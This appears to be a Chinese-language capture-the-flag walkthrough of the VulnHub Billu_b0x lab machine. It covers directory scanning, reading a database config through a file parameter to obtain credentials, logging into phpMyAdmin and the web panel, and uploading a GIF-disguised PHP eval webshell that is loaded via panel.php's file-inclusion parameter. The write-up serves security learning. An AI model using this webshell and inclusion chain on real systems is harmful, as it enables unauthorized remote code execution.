1.下载靶机
https://download.vulnhub.com/billu/Billu\\_b0x.zip
2.信息收集
kali和靶机ip


访问靶机ip

扫描敏感目录

3.漏洞挖掘
一一访问每个文件

发现add.php是一个上传界面,但是功能无法使用,查看源码文件发现只是个页面,没有后台处理代码。in.php是php info信息。test文件下貌似可以进行传参
file传参

get传参不可以,用bp抓包转换为post传参

查看c.php源码
这是数据库连接文件,发现mysql连接用户名密码:
用户名:billu
密码:b0x_billu
数据库名:ica_lab

通过得到的mysql密码登录phpmyadmin成功

在ica_lab
数据库的auth表中,找到web登录的用户名:biLLu,密码:hEx_it。

登录web界面


上传图片,查看图片,存在目录浏览



webshell连接
上传图片马
GIF89a
<?php @eval($_POST['cmd']);?>
然后使用POST传参
http://192.168.126.170/panel.php
load=uploaded_images/2.png&continue=continue

蚁剑连接



